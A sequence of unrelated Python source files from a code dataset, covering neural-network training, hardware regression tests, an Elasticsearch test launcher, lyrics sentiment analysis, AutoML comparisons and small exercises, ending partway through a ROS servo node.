tf.multiply(d, e, name='a')\n\n\t# initialisation\n\tinit_op = tf.global_variables_initializer()\n\n\t# start session to run operation above\n\twith tf.Session() as sess:\n\t\tsess.run(init_op)\n\t\t# no need for runing d,e operations\n\t\tif b_is_tensor:\n\t\t\t# feed_dict for placeholder variables\n\t\t\ta_out = sess.run(a, feed_dict={b: np.arange(0,10)[:, np.newaxis]})\n\t\telse:\n\t\t\ta_out = sess.run(a)\n\t\tprint(\"Variable a is {}\".format(a_out))\n\ndef ann_on_mnist():\n\t# load data\n\tmnist = input_data.read_data_sets(\"../data/MNIST_data/\", one_hot=True)\n\n\t# setting parameters for network\n\tlearning_rate = 0.5\n\tepochs = 20\n\tbatch_size = 100\n\n\t# input images and labels\n\tx = tf.placeholder(tf.float32, [None, 784], name='x')\n\ty = tf.placeholder(tf.float32, [None, 10], name='y')\n\n\t# weights and bias\n\tW1 = tf.Variable(tf.random_normal([784,300], stddev=0.03), name='W1')\n\tb1 = tf.Variable(tf.random_normal([300]), name='b1')\n\tW2 = tf.Variable(tf.random_normal([300,10], stddev=0.03), name='W2')\n\tb2 = tf.Variable(tf.random_normal([10]), name='b2')\n\n\t# operations for layers, not the dimensions\n\thidden_out = tf.add(tf.matmul(x, W1), b1)\n\thidden_out = tf.nn.relu(hidden_out)\n\n\ty_ = tf.nn.softmax(tf.add(tf.matmul(hidden_out, W2), b2))\n\n\t# -y*log(y_)-(1-y)*log(1-y_)\n\t# if y_ = 0 or 1, then log(0) appear in loss function, stop training\n\t# so need clip\n\ty_clipped = tf.clip_by_value(y_, 1e-10, 0.9999)\n\n\t# define cross entropy\n\tcross_entropy = -tf.reduce_mean(tf.reduce_sum(y * tf.log(y_clipped)\n\t\t+ (1 - y)*tf.log(1 - y_clipped), axis = 1))\n\n\t# define optimizer\n\toptimizer = tf.train.GradientDescentOptimizer(learning_rate=learning_rate).minimize(cross_entropy)\n\n\t# init_op\n\tinit_op = tf.global_variables_initializer()\n\n\t# define accuracy assessment operation\n\tcorrect_prediction = tf.equal(tf.argmax(y,1), tf.argmax(y_, 1))\n\taccuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n\n\t# start a session\n\twith tf.Session() as sess:\n\t\tsess.run(init_op)\n\t\ttotal_batch = int(len(mnist.train.labels) / batch_size)\n\t\tfor epoch in range(epochs):\n\t\t\tavg_cost = 0\n\t\t\tfor i in range(total_batch):\n\t\t\t\tbatch_x, batch_y = 
mnist.train.next_batch(batch_size=batch_size)\n\t\t\t\t_, c = sess.run([optimizer, cross_entropy], feed_dict={x: batch_x, y: batch_y})\n\t\t\t\tavg_cost += c/total_batch\n\t\t\tprint(\"Epoch: \", (epoch+1), \"Cost:\", \"{:.3f}\".format(avg_cost))\n\t\tprint(sess.run(accuracy, feed_dict={x:mnist.test.images, y:mnist.test.labels}))\n\n\n\nif __name__ == '__main__':\n\t#simple_test()\n\tann_on_mnist()\n","sub_path":"mnist_with_tensorflow.py","file_name":"mnist_with_tensorflow.py","file_ext":"py","file_size_in_byte":3356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"121416524","text":"from case.CBaseCase import *\n\nclass T2408_uefi_ReInitNvramTableWhenSysTypeChange(CBaseCase):\n '''\n **************************************************************\n [Purpose ]: Checks that NVRAM Map Table re-inits when the system type\n changes.\n [Author ]: Celine.Xu@emc.com\n [Sprint ]: ATOM 2.0.6\n [Tickets ]: ATOM-1482\n [Platform]: Europa, Oberon, Hyperion\n [Type ]: Auto\n [History ]:\n - Jane Jin 3/21/2014\n First edition.\n - Chris Campetti 12/19/2014\n Updated case to match recent Atom conventions and fixed default\n NVRAM values.\n **************************************************************\n '''\n def __init__(self):\n CBaseCase.__init__(self, self.__class__.__name__)\n self.__restore_system_type = False\n\n def config(self):\n sp = self.enclosure.sp\n \n #Change to Manufacturing Mode if needed\n self.log('INFO', 'Getting current system type')\n str_system_type = sp.get_system_type()\n if str_system_type == '':\n raise Exception('FAIL', 'Error getting system type')\n\n if str_system_type != 'Manufacturing Mode':\n self.log('INFO', 'System type is not Manufacturing Mode, '\\\n 'switching to Manufacturing Mode')\n self.__switch_system_type('Manufacturing Mode') \n\n def test(self):\n nvram = self.enclosure.sp.nvram\n sp = self.enclosure.sp\n \n #Check that table is inititally the default\n b_ret = nvram.check_nvram_map_table_in_debugger()\n if not b_ret:\n str_msg = 'Initial NVRAM Map Table is not the default'\n raise Exception('FAIL', str_msg) \n int_ret = sp.obj_post.exit_debugger()\n if int_ret != 0:\n raise Exception('FAIL', 'Failed to exit POST debugger')\n lst_new_entry = ['17300000', '00300000', 'feedface']\n self.log('INFO', 'Adding new NVRAM Map Table entry {}'.format(\n lst_new_entry))\n int_ret = nvram.add_nvram_map_entry('10054', lst_new_entry)\n if int_ret != 0:\n raise Exception('FAIL', 'Failed to add new NVRAM Map Table entry')\n\n #Confirm the table changed from the default\n b_ret = nvram.check_nvram_map_table_in_debugger()\n if b_ret:\n str_msg = 'Initial NVRAM Map Table did not change after adding'\\\n 'an entry'\n raise Exception('FAIL', str_msg) \n int_ret = sp.obj_post.exit_debugger()\n if int_ret != 0:\n raise Exception('FAIL', 'Failed to exit POST debugger')\n\n #Switch system type\n str_type = sp.str_product_type\n if str_type == '':\n errmsg = 'Don\\'t know the product system type for %s.' 
\\\n % self.str_platform\n raise Exception('BLOCK', errmsg)\n self.__switch_system_type(str_type)\n self.__restore_system_type = True\n\n #Check that table is back to default\n b_ret = nvram.check_nvram_map_table_in_debugger()\n if not b_ret:\n str_msg = 'Initial NVRAM Map Table is not the default'\n raise Exception('FAIL', str_msg) \n int_ret = sp.obj_post.exit_debugger()\n if int_ret != 0:\n raise Exception('FAIL', 'Failed to exit POST debugger')\n\n def deconfig(self):\n if self.__restore_system_type:\n self.log('INFO', 'Restoring system type to Manufacturing Mode')\n self.__switch_system_type('Manufacturing Mode')\n\n def __switch_system_type(self, str_system_type):\n sp = self.enclosure.sp\n sp.switch_system_type(str_system_type)\n self.config_bmc_console_for_sp(sp)\n","sub_path":"case/regression/bios/T2408_uefi_ReInitNvramTableWhenSysTypeChange.py","file_name":"T2408_uefi_ReInitNvramTableWhenSysTypeChange.py","file_ext":"py","file_size_in_byte":3757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"486507454","text":"# random number program\n# User select number in range 1 to 100\n# AI should guess the number\n# User will lead AI to the correct answer by providing more or less\n#\n# used \"Binary search algorithm\" https://en.wikipedia.org/wiki/Binary_search_algorithm\n#\n\nimport random\n\ndef computer_guess(num):\n low = 1\n high = 100\n guess = random.randint(low, high)\n while guess != num:\n print(\"The computer takes a guess \", guess)\n if guess > num:\n high = guess\n print(\"High is {} and low is {}\".format(high, low))\n elif guess < num:\n low = guess + 1\n print(\"Low is {} and high is {}\".format(low, high))\n guess = (low + high) // 2\n\n print(\"The computer guessed\", guess, \"and it was correct!\")\n\n\ndef main():\n num = int(input(\"Enter a number: \"))\n if num < 1 or num > 100:\n print(\"Must be in range [1, 100]\")\n else:\n computer_guess(num)\n\nif __name__ == '__main__':\n main()","sub_path":"michael_dowson/random_number_guess_by_AI.py","file_name":"random_number_guess_by_AI.py","file_ext":"py","file_size_in_byte":966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"387813513","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Mar 11 20:31:08 2020\n\n@author: 86158\n\"\"\"\n#import n, start the loop\ntemp=input('please input a positive integer:')\nn = int(temp)\nprint(n,\"-\")\nwhile n>1 :\n#judge n even or odd, give different operations\n #if the number is even\n if n%2==0:\n n=n/2\n print(n,\"-\")\n #if the number is odd\n else:\n n=n*3+1\n print(n,\"-\")\n\n ","sub_path":"practical5/collatz.py","file_name":"collatz.py","file_ext":"py","file_size_in_byte":389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"564587816","text":"import logging\nimport os\nimport os.path\nimport shutil\nimport subprocess\nimport tempfile\n\n\nCONF = \"\"\"\\\ncluster.name: \"{cluster_name}\"\nnode.name: \"{node_name}\"\nindex.number_of_shards: 1\nindex.number_of_replicas: 0\nnetwork.host: \"{host}\"\nhttp.port: {port}\ntransport.tcp.port: {tport}\ndiscovery.zen.ping.multicast.enabled: false\ndiscovery.zen.ping.unicast.hosts: \"{hosts}\"\npath.conf: \"{config_path}\"\npath.work: \"{working_path}\"\npath.plugins: \"{working_path}\"\npath.data: \"{data_path}\"\npath.logs: \"{log_path}\"\n\"\"\"\n\nLOG_CONF = \"\"\"\\\nrootLogger: INFO, console, file\n\nlogger:\n action: DEBUG\n\nappender:\n console:\n type: 
\"console\"\n layout:\n type: \"consolePattern\"\n conversionPattern: \"[%d{ISO8601}][%-5p][%-25c] %m%n\"\n\n file:\n type: dailyRollingFile\n file: \"${path.logs}/${cluster.name}.log\"\n datePattern: \"'.'yyyy-MM-dd\"\n layout:\n type: \"pattern\"\n conversionPattern: \"[%d{ISO8601}][%-5p][%-25c] %m%n\"\n\"\"\"\n\n\nclass Node(object):\n \"\"\"Start a new ElasticSearch node, isolated in a temporary\n directory and part of a cluster.\n \"\"\"\n\n def __init__(self, cluster, name, port, trans_port):\n \"\"\"Create a new cluster node.\n\n :param cluster: A cluster instance which this node is a part of.\n :type cluster: :class:`~pyelastictest.cluster.Cluster`\n :param name: The name of the node.\n :type name: str\n :param port: The public client port.\n :type port: int\n :param trans_port: The internal cluster communication port.\n :type trans_port: int\n \"\"\"\n self.cluster = cluster\n self.working_path = tempfile.mkdtemp(dir=cluster.working_path)\n self.name = name\n self.port = port\n self.trans_port = trans_port\n self.url = 'http://%s:%s' % (self.cluster.ip, port)\n self.running = False\n self.process = None\n self.logger = logging.getLogger(self.name)\n self.stdout = None\n self.stderr = None\n\n def start(self):\n \"\"\"Start the node as a subprocess in a temporary directory.\n \"\"\"\n install_path = self.cluster.install_path\n bin_path = os.path.join(self.working_path, \"bin\")\n config_path = os.path.join(self.working_path, \"config\")\n conf_path = os.path.join(config_path, \"elasticsearch.yml\")\n log_path = os.path.join(self.working_path, \"logs\")\n log_conf_path = os.path.join(config_path, \"logging.yml\")\n data_path = os.path.join(self.working_path, \"data\")\n\n # create temporary directory structure\n for path in (bin_path, config_path, log_path, data_path):\n if not os.path.exists(path):\n os.mkdir(path)\n\n # copy ES startup scripts\n es_bin_dir = os.path.join(install_path, 'bin')\n shutil.copy(os.path.join(es_bin_dir, 'elasticsearch'), bin_path)\n shutil.copy(os.path.join(es_bin_dir, 'elasticsearch.in.sh'), bin_path)\n\n # write configuration file\n with open(conf_path, \"w\") as config:\n config.write(CONF.format(\n cluster_name=self.cluster.name,\n node_name=self.name,\n host=self.cluster.ip,\n port=self.port,\n tport=self.trans_port,\n hosts=','.join(self.cluster.hosts),\n working_path=self.working_path,\n config_path=config_path,\n data_path=data_path,\n log_path=log_path,\n ))\n\n # write log file\n with open(log_conf_path, \"w\") as config:\n config.write(LOG_CONF)\n\n # create stdout/err files\n self.stdout = tempfile.TemporaryFile(\n suffix='stdout', dir=self.working_path)\n self.stderr = tempfile.TemporaryFile(\n suffix='stderr', dir=self.working_path)\n\n # setup environment, copy from base process\n environ = os.environ.copy()\n # configure explicit ES_INCLUDE, to prevent fallback to\n # system-wide locations like /usr/share, /usr/local/, ...\n environ['ES_INCLUDE'] = os.path.join(bin_path, 'elasticsearch.in.sh')\n lib_dir = os.path.join(install_path, 'lib')\n # let the process find our jar files first\n path = '{dir}/elasticsearch-*:{dir}/*:{dir}/sigar/*:$ES_CLASSPATH'\n environ['ES_CLASSPATH'] = path.format(dir=lib_dir)\n # reduce JVM startup time\n environ['ES_MIN_MEM'] = '64m'\n environ['JAVA_OPTS'] = \\\n '-client -XX:+TieredCompilation -XX:TieredStopAtLevel=1'\n\n self.process = subprocess.Popen(\n args=[bin_path + \"/elasticsearch\", \"-f\",\n \"-Des.config=\" + conf_path],\n stdout=self.stdout,\n stderr=self.stderr,\n env=environ\n )\n self.running = 
True\n\n def stop(self):\n \"\"\"Stop the node and terminate the subprocess.\n \"\"\"\n if self.running:\n # dump log fies to logging module\n self.logger.debug('### Begin captured stdout ###')\n self.stdout.seek(0)\n for line in self.stdout.readlines():\n self.logger.debug(line)\n self.logger.debug('### End captured stdout ###')\n self.logger.debug('### Begin captured stderr ###')\n self.stderr.seek(0)\n for line in self.stderr.readlines():\n self.logger.debug(line)\n self.logger.debug('### End captured stderr ###')\n try:\n self.process.terminate()\n except OSError:\n # might not have been running\n pass\n else:\n self.process.wait()\n self.running = False\n","sub_path":"pyelastictest/node.py","file_name":"node.py","file_ext":"py","file_size_in_byte":5650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"126867447","text":"import sys\nimport json\n\nsys_path = json.load(open('../../../../../paths.json',))['sys_path']\n\nsys.path.append(sys_path)\n\nfrom loss import *\nfrom multi_scale import MultiScale\nfrom dataloader import *\nfrom BaseModel import BaseModel\n\nimport torch.optim as optim\n\nif torch.cuda.is_available():\n device = 'cuda:0'\nelse:\n device = 'cpu'\n\n##################\n# # # Config # # # \n##################\n\nepochs = 500\nbatch_size = 4\n\n# Data\ndata_dir = '../../../../Training_Data/Moseley_EARTH/'\ndata_csv = '../../../../Training_Data/Moseley_Earth_AR.csv'\nvelocity_field = '../../../../Training_Data/Velocity_Field_1.npy'\n\n# Paths\nsave_dir = '../results/'\nsave_pt = f'AR_PINN_MSE_E{epochs}.pt'\nsave_txt = f'AR_PINN_MSE_E{epochs}.yml'\n\ncheckpoint_path = f'checkpoint_AR_PINN_MSE_E{epochs}.pt'\n\n# # # Data\ntraining_data = dataset(data_dir,data_csv,velocity_field=velocity_field)\ntrain_loader = DataLoader(training_data, batch_size=batch_size, shuffle=True)\n\nnet = MultiScale(in_channels=5)\n\n# Optimizer & Scheduler\noptimizer = optim.Adam(net.parameters(), lr=0.00001, weight_decay=1e-6)\n\nclass MultiScaleModel(BaseModel):\n def __init__(self, net, N,T, opt=None, sched=None, logger=None, print_progress=True, device='cuda:0'):\n \"\"\"\n\n \"\"\"\n super().__init__(net, opt, sched, logger, print_progress, device)\n\n self.loss_fn = PINNLoss_MSE(dh=5, dt=0.002, c=torch.Tensor(training_data.velocity_field_values)[None,None].to(device), device='cuda:0')\n\n self.T = T\n self.N = N\n\n def forward_loss(self, data):\n \"\"\"\n\n \"\"\"\n input = data['wave_input'].transpose(2, 1)\n input = input.to(self.device)\n\n loss_epoch = 0\n\n for i in range(self.N):\n loss = 0\n self.optimizer.zero_grad()\n\n for j in range(0,self.T):\n \n input_4 = input[:,:,::4,::4]\n input_2 = input[:,:,::2,::2]\n input_1 = input\n\n output = self.net(input_4,input_2,input_1) # 1 x 5 x 300 x 300 --> 1 x 1 x 300 x 300\n\n pinn = torch.cat((input,output),axis=1) # 1 x 6 x 300 x 300 \n\n loss = loss + self.loss_fn(inputs=pinn)\n\n input = torch.cat((pinn[:,1:4,:,:],pinn[:,5:6,:,:],pinn[:,4:5,:,:]),dim=1) # Three previous timesteps + Last predicted timestep + Velocity field --> # 1 x 5 x 300 x 300 \n\n #print('N =',i)\n\n loss_epoch = loss_epoch + loss\n\n loss.backward()\n self.optimizer.step()\n input = input.detach()\n\n return torch.tensor(0., requires_grad=True), {'Loss':loss_epoch, 'Loss AR PINN MSE':loss_epoch} \n\n# Create the model\nmodel = MultiScaleModel(net=net, N=50,T=4, opt=optimizer, sched=None, logger=None, print_progress=True, device=device)\n\n# Train the model\nmodel.train(epochs, train_loader, 
checkpoint_path=checkpoint_path, checkpoint_freq=5, save_best=None)\n\n# Save\n#model.save_best(export_path=save_dir + save_pt_best)\nmodel.save(export_path=save_dir + save_pt)\nmodel.save_outputs(export_path=save_dir + save_txt)","sub_path":"DNN_Test/Layered/Training/multiscale/config/multiscale_AR_PINN_MSE.py","file_name":"multiscale_AR_PINN_MSE.py","file_ext":"py","file_size_in_byte":3059,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"255821763","text":"import time\nfrom os import mkdir\nfrom os.path import basename, splitext, join, exists\nimport random\nimport numpy as np\nimport torch\nfrom torch.autograd import Variable\nimport deconvolutional_net as net\nimport cv2 as cv\nimport torch.nn as nn\nfrom torchvision.utils import save_image\nfrom utils import test_transform\nfrom PIL import Image\n\n\nresolution = 512\namplitude =10.\nlayer = 4\n\ndecoder_path = \"models/vgg_deconv.pth\"\nvgg_path = \"models/vgg_normalised.pth\"\nref_path = \"encodings/ref/\"\ncontent_dir = \"input/content/\"\n\nencoding_dir = \"encodings\"\noutput_dir = join(\"output\", \"channel_activations_noise_norm\")\nif not exists(output_dir):\n mkdir(output_dir)\n\ntorch.cuda.set_device(0)\ndecoder = net.decoder\nvgg = net.vgg\n\nvgg.load_state_dict(torch.load(vgg_path))\nvgg = nn.Sequential(*list(vgg.children())[:31])\ndecoder.load_state_dict(torch.load(decoder_path))\nnetwork = net.Net(vgg, decoder)\nnetwork.cuda()\n\nimage_name = \"avril.jpg\"\nimage_path = join(content_dir, image_name)\nimg = cv.imread(image_path)\nchannels = img.shape[2]\nif channels == 1:\n img = cv.cvtColor(img, cv.COLOR_GRAY2RGB)\nelif channels == 4:\n img = cv.cvtColor(img, cv.COLOR_BGRA2RGB)\nelse:\n print(\"gm\")\n #img = cv.cvtColor(img, cv.COLOR_BGR2RGB)\n\n\n\nimage_tf = test_transform((resolution,resolution), False)\n\n\ninput_tensor = image_tf(Image.fromarray(img))\ninput_tensor = input_tensor.cuda()\ninput_variable = Variable(input_tensor.unsqueeze(0), volatile=True)\n\n\n\n# cv.putText(frame, \"{}\".format(neuron_index), (15,15), cv.FONT_HERSHEY_PLAIN, 1.,(1.,1.,1.))\ncv.imshow(\"Input\", img)\ncv.waitKey(0)\n\n\nreference_input = join(ref_path, \"reference_encoding_{}_relu{}.npy\".format(resolution, layer))\nreference_input = np.load(reference_input)\nnum_neurons = reference_input.shape[1]\n\n\n\nfor activated_neuron_index in range(num_neurons):\n\n neuron_index = activated_neuron_index\n\n t = time.time()\n\n\n image = network.mini_pass(input_variable)\n #image = network.test_pass(input_variable)\n frame = image.cpu().data.numpy()[0]\n minimum = np.min(frame)\n maximum = np.max(frame)\n frame = (frame -minimum)/(maximum - minimum)\n\n frame = np.transpose(frame, (1,2,0))\n\n\n t = time.time() - t\n print(\"Took {} seconds to extract encoding\".format(t))\n frame = cv.cvtColor(frame, cv.COLOR_RGB2BGR)\n cv.putText(frame, \"{}\".format(neuron_index), (15,15), cv.FONT_HERSHEY_PLAIN, 1.,(1.,1.,1.))\n cv.imshow(\"Neuron activation\", frame)\n cv.waitKey(33)\n out_file = \"layer4_channel{}.png\".format(str(activated_neuron_index).zfill(3))\n out_path = join(output_dir, out_file)\n #save_image(image,out_path, normalize=True)\n #cv.imwrite(out_path, frame)\n del image, frame\n torch.cuda.empty_cache()\n","sub_path":"deconvolution_test.py","file_name":"deconvolution_test.py","file_ext":"py","file_size_in_byte":2702,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"36652781","text":"from collections import Counter\nimport 
re\nfrom statistics import mean\n\nimport nltk\nfrom nltk.corpus import wordnet\nfrom requests_html import HTMLSession\nfrom textblob import TextBlob\nfrom textblob import Word\n\nfrom lyrics_parser.helpers.helpers import STOP_WORDS\n\n\nclass Parser:\n \"\"\"\n Build up a dictionary of information about songs by an artist\n and process that information.\n \"\"\"\n def __init__(self, songs):\n # Set authorization header in order to use Genius API\n # (https://docs.genius.com/)\n self.headers = {\n \"Authorization\": \"Bearer {}\".format(\n \"umuTypKle_tO2TrPvkM6FDqDiV1LIevm8QvHd92fJ4o-2Ui0h2yfnsyNwxeY9cUa\"\n )\n }\n\n self.songs = songs\n\n def _get_lyrics_and_title(self, url):\n session = HTMLSession()\n session.headers = self.headers\n response = session.get(url)\n\n title = response.html.find(\n \".header_with_cover_art-primary_info-title\",\n first=True\n ).text\n\n lyrics = response.html.find(\".lyrics\", first=True).text\n\n return title, lyrics\n\n def _format_word(self, word):\n \"\"\"\n Lemmatize (https://en.wikipedia.org/wiki/Lemma_(morphology)),\n capitalize, and remove punctuation (other than apostrophes).\n \"\"\"\n punctuation_stripped = re.sub(r\"[^\\w\\d'\\s]+\", '', word)\n lemmatized = Word(punctuation_stripped).lemmatize()\n capitalized = lemmatized.capitalize()\n\n return capitalized\n\n def _remove_common_words(self, lyrics):\n \"\"\"\n Exclude common words by comparing lyrics to a list of Stop Words\n (https://en.wikipedia.org/wiki/Stop_words)\n \"\"\"\n return [word for word in lyrics.split() if word.lower() not in STOP_WORDS]\n\n def _prepare_lyrics(self, lyrics):\n \"\"\"\n Remove common English words from lyrics, remove blank items,\n and format the remaining words.\n \"\"\"\n uncommon_words = self._remove_common_words(lyrics)\n processed_string = list(map(\n self._format_word,\n uncommon_words\n ))\n\n strip_blanks = list(\n filter(lambda x : x.strip() != \"\", processed_string)\n )\n\n return strip_blanks\n\n def _analyse_sentiment(self, lyrics):\n \"\"\" Analyse the overall positivty/negativity and\n subjectivity/objectivity of the lyrics in a song.\n\n Break the lyrics down into TextBlob Sentence objects. Create a list\n of Sentiments for those Sentences. 
Return the mean polarity and\n subjectivity of the song.\n \"\"\"\n sentences = TextBlob(lyrics).sentences\n sentiments = [sentence.sentiment for sentence in sentences]\n\n mean_polarity = mean(\n [sentiment.polarity for sentiment in sentiments]\n )\n\n mean_subjectivity = mean(\n [sentiment.subjectivity for sentiment in sentiments]\n )\n\n return mean_polarity, mean_subjectivity\n\n def _analyse_themes(self, lyrics):\n \"\"\" Very roughly establish what concepts are commonly referred to\n by this artist.\n\n Create a list of Synsets (http://www.nltk.org/howto/wordnet.html),\n find the most common hypernyms (https://en.wikipedia.org/wiki/Hyponymy_and_hypernymy),\n count them and return the 5 most common.\n \"\"\"\n synsets = []\n for word in lyrics:\n synsets.extend(wordnet.synsets(word))\n\n hypernyms = []\n for synset in synsets:\n hypernyms.extend(synset.hypernyms())\n\n # Return the name of the first lemma (https://en.wikipedia.org/wiki/Lemma_(morphology))\n # of each hypernym (so we can deal with English words)\n hypernym_lemmas = [\n x.lemma_names()[0].replace(\"_\", \" \").capitalize() for x in hypernyms\n ]\n\n counter = Counter(hypernym_lemmas)\n return counter.most_common(3)\n\n def _get_word_frequencies(self, words):\n return Counter(words)\n\n def _get_mean_polarity(self):\n \"\"\"\n Calculate the mean polarity (positivity/negativity)\n of all the songs in the dictionary.\n \"\"\"\n polarities = []\n for key, value in self.songs.items():\n if value[\"sentiment\"][0] != '':\n polarities.append(float(value[\"sentiment\"][0]))\n\n if len(polarities) > 0:\n return mean(polarities)\n else:\n return None\n\n def _get_mean_subjectivity(self):\n \"\"\"\n Calculate the mean subjectivity of all the songs in the dictionary.\n \"\"\"\n subjectivities = []\n for key, value in self.songs.items():\n if value[\"sentiment\"][1] != '':\n subjectivities.append(float(value[\"sentiment\"][1]))\n\n if len(subjectivities) > 0:\n return mean(subjectivities)\n else:\n return None\n\n def add_song(self, url):\n \"\"\"\n Build a dictionary of information about a song from a given url.\n\n Add this dictionary to the dictionary of songs.\n\n :param url: The URL of the song\n \"\"\"\n title, lyrics = self._get_lyrics_and_title(url)\n words = self._prepare_lyrics(lyrics)\n\n self.songs[title] = {\n \"word frequencies\": self._get_word_frequencies(words),\n \"lyrics\": lyrics,\n \"sentiment\": self._analyse_sentiment(lyrics),\n \"themes\": self._analyse_themes(words)\n }\n\n def process_all_lyrics(self):\n \"\"\" Calculate general information about the songs.\n\n Sum all of the word frequencies from each song. Get the mean\n polarity and subjectivity of the songs. 
Sum all of the common\n themes and again count them.\n\n :return: A dictionary containing the above information\n \"\"\"\n counter = Counter([])\n for key, value in self.songs.items():\n counter += value[\"word frequencies\"]\n\n polarity = self._get_mean_polarity()\n subjectivity = self._get_mean_subjectivity()\n\n themes = []\n for key, value in self.songs.items():\n # Build a list of strings from the counted themes\n string_only = [theme[0] for theme in value[\"themes\"]]\n themes.extend(string_only)\n\n data = {\n \"word frequencies\": counter.most_common(10),\n \"polarity\": polarity,\n \"subjectivity\": subjectivity,\n \"theme frequencies\": Counter(themes).most_common(5)\n }\n\n return data\n","sub_path":"lyrics_parser/helpers/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":6504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"574009576","text":"from sklearn.datasets import make_classification\nimport sklearn.model_selection\nfrom AutoSKLearn_test import AutoSKLearn_comparison\nfrom TPOT_test import TPOT_comparison\n#from randomized_TPOT_test import randomized_TPOT_comparison\nfrom baseline_test import baseline_comparison\n\nimport json\nimport os\nimport datetime\n\n\ndef main():\n params = dict()\n\n # Params simulation\n params['n_cores'] = 4\n params['total_time'] = 60\n params['n_simulations'] = 5\n\n # Training test split\n params['test_size'] = 0.9\n\n # Params data generation\n params['n_samples'] = 50000\n params['n_features'] = 50\n params['n_informative'] = 15\n params['n_classes'] = 2\n params['n_redundant'] = 10\n params['n_clusters_per_class'] = 5\n params['flip_y'] = 0.05\n\n output_path = \"/home/thomas/results_simulation/results_\" + datetime.datetime.now().strftime(\"%Y_%m_%d_%H_%M\")\n os.mkdir(output_path)\n\n for i in range(params['n_simulations']):\n params['random_state'] = i + 1\n print(params)\n X, y = make_classification(n_samples=params['n_samples'],\n n_features=params['n_features'],\n n_informative=params['n_informative'],\n n_classes=params['n_classes'],\n n_redundant=params['n_redundant'],\n n_clusters_per_class=params['n_clusters_per_class'],\n random_state=params['random_state'],\n flip_y=params['flip_y'])\n\n X_train, X_test, y_train, y_test = \\\n sklearn.model_selection.train_test_split(X, y, test_size=params['test_size'],\n random_state=params['random_state'])\n\n # Testing auto sklearn\n test_autosklearn = AutoSKLearn_comparison(X_train=X_train, X_test=X_test,\n y_train=y_train, y_test=y_test,\n total_time=params['total_time'],\n n_cores=params['n_cores'])\n\n results_autosklearn = test_autosklearn.sort_values(by=\"Cross-Validation accuracy\", ascending=False)\n results_autosklearn.to_csv(output_path + \"/autosklearn_results_\" + str(i) + \".csv\")\n\n # Testing TPOT\n test_tpot = TPOT_comparison(X_train=X_train, X_test=X_test,\n y_train=y_train, y_test=y_test,\n total_time=params['total_time'],\n n_cores=params['n_cores'])\n\n results_tpot = test_tpot.sort_values(by=\"Cross-Validation accuracy\", ascending=False)\n results_tpot.to_csv(output_path + \"/tpot_results_\" + str(i) + \".csv\")\n\n # Test baseline\n test_baseline = baseline_comparison(X_train=X_train, X_test=X_test,\n y_train=y_train, y_test=y_test)\n\n results_combined = {\"params\": params,\n \"results baseline\": test_baseline,\n # \"results randomized tpot\": results_randomized_tpot[0],\n \"results tpot\": results_tpot[0],\n \"results autosklearn\": results_autosklearn[0]}\n\n\n with open(output_path + 
\"/results_\" + str(i) + \".txt\", 'x') as file:\n file.write(json.dumps(results_combined))\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"AutoML/AutoML_comparison.py","file_name":"AutoML_comparison.py","file_ext":"py","file_size_in_byte":3510,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"381030894","text":"from lib.poker.card import Card\n\nclass Action(object):\n\n def __init__(self):\n pass\n\n # action = 0 是不要排\n @staticmethod\n def correct_action(play, action, action_history):\n correct = True\n card = ''\n last_action = 0\n if len(action_history) > 0:\n for item in list(reversed(action_history)):\n if item[1] > 0:\n last_action = item[1]\n break;\n\n if action > 0:\n card = Card.from_id(action)\n if card in play.cards:\n if len(action_history) > 0 and action < last_action:\n correct = False\n else:\n correct = False\n else:\n if len(action_history) == 0:\n # 开始不能为0\n correct = False\n else:\n # 检测用户手中是否有大于action_history中最后一个大于0的\n for c in play.cards:\n if Card.to_id(c) > last_action:\n correct = False\n break;\n\n\n # print('action check -->play cards:{} action:{} card:{} last action:{}'.format(play.cards,action, card, last_action))\n\n return correct\n\n # 选择该用户满足条件的动作列表\n @staticmethod\n def play_valid_actions(play, action_history):\n last_action = 0 if len(action_history) == 0 else action_history[-1][-1]\n actions = [Card.to_id(x) for x in play.cards if Card.to_id(x) > last_action]\n return actions","sub_path":"game/lib/poker_v1/action.py","file_name":"action.py","file_ext":"py","file_size_in_byte":1559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"303001842","text":"# Enter your code here. Read input from STDIN. Print output to STDOUT\r\n\r\ndef get_pair(arr, n):\r\n colors = {}\r\n pairs_count = 0\r\n for i in arr:\r\n if i in colors.keys():\r\n colors[i] += 1\r\n \r\n else:\r\n colors[i] = 1\r\n\r\n if colors[i] % 2 == 0:\r\n pairs_count += 1\r\n return pairs_count\r\n\r\nif __name__ == \"__main__\":\r\n n = input()\r\n arr = [] \r\n for i in input().split(): \r\n element = int(i) \r\n arr.append(element)\r\n\r\n print(get_pair(arr, n))","sub_path":"hacker_rank/sock_merchant.py","file_name":"sock_merchant.py","file_ext":"py","file_size_in_byte":539,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"288155435","text":"#!/usr/bin/env python\nimport rospy\nimport time\n\nfrom servo import OnohatServo\nfrom opsoro_workbench.srv import EnablePcaPower\nfrom std_msgs.msg import String\nfrom geometry_msgs.msg import Point\nfrom std_msgs.msg import Bool\nfrom std_msgs.msg import Float32\n\nclass FaceMotor(object):\n\tdef __init__(self, name):\n\t\tself.name = name\n\t\trospy.init_node(self.name)\n\t\tself.rate = rospy.Rate(10) # 10hz\n\t\tself.initPublishers()\n\t\tself.initSubscribers()\n\t\tself.initVariables()\n\n\tdef 